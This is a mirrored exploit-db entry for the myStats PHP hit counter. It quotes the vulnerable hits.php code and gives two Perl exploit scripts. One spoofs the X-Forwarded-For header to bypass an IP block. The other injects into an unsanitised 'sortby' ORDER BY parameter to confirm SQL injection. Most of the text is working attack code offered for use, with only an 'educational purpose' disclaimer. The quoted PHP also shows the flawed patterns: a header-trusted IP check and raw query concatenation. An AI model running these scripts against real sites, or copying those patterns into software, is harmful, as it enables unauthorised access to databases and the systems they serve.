bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/6759.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

110 lines
No EOL
2.1 KiB
Text
Raw Blame History

# myStats (hits.php) Multiple Remote Vulnerabilities Exploit
# url: http://mywebland.com/
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# Greetz To: All Hackers and milw0rm website
---------------------
Break System Block IP
---------------------
<<hits.php>>
7: if (@getenv("HTTP_X_FORWARDED_FOR"))
{ $u_ip = @getenv("HTTP_X_FORWARDED_FOR"); }
else { $u_ip = @getenv("REMOTE_ADDR"); }
if ($u_ip == BLOCK_IP)
{ return 1;
13: exit; }
<<config.php>>
11: define("BLOCK_IP", "127.0.0.1");
<<exploit.pl>>
use HTTP::Request;
use LWP::UserAgent;
my $web="http://localhost/hits.php";
my $ua=LWP::UserAgent->new();
$ua->default_header('X-Forwarded-For' => "127.1.1.1");
my $respuesta=HTTP::Request->new(GET=>$web);
$ua->timeout(30);
my $response=$ua->request($respuesta);
$contenido=$response->content;
if ($response->is_success)
{
open(FILE,">>results.txt");
print FILE "$contenido\n";
close(FILE);
print "\n[+] Exploit Succesful!\n\n";
}
else
{
print "\n[-] Exploit Failed!\n\n";
}
<<proof of concept>>
$ua->default_header('X-Forwarded-For' => "127.1.1.1"); --> BREAK BLOCK_IP
-------------
SQL Injection
-------------
<<hits.php>>
63: if (isset($_GET['sortby']))
{$sortby = $_GET['sortby'];}
else
{ $sortby = 'timestamp' ;}
$sql = "SELECT * FROM " . LOG_TBL . " ORDER BY " . $sortby." DESC LIMIT 0, ". DISPLAY_LOG_NO ;
69: $querylog = mysql_query($sql) or die("Line 117 Cannot query the database.<br>" . mysql_error());
<<exploit.pl>>
use HTTP::Request;
use LWP::UserAgent;
my $web="http://localhost/hits.php?sortby=1'";
my $ua=LWP::UserAgent->new();
my $respuesta=HTTP::Request->new(GET=>$web);
$ua->timeout(30);
my $response=$ua->request($respuesta);
$contenido=$response->content;
if ($response->is_success)
{
if($contenido =~ /You have an error in your SQL syntax;/)
{
print "\n[+] Exploit Succesful!\n";
print "\n[+] Content:\n";
print "$contenido\n\n";
}
}
else
{
print "\n[-] Exploit Failed!\n\n";
}
# milw0rm.com [2008-10-15]
Reference in a new issue View git blame Copy permalink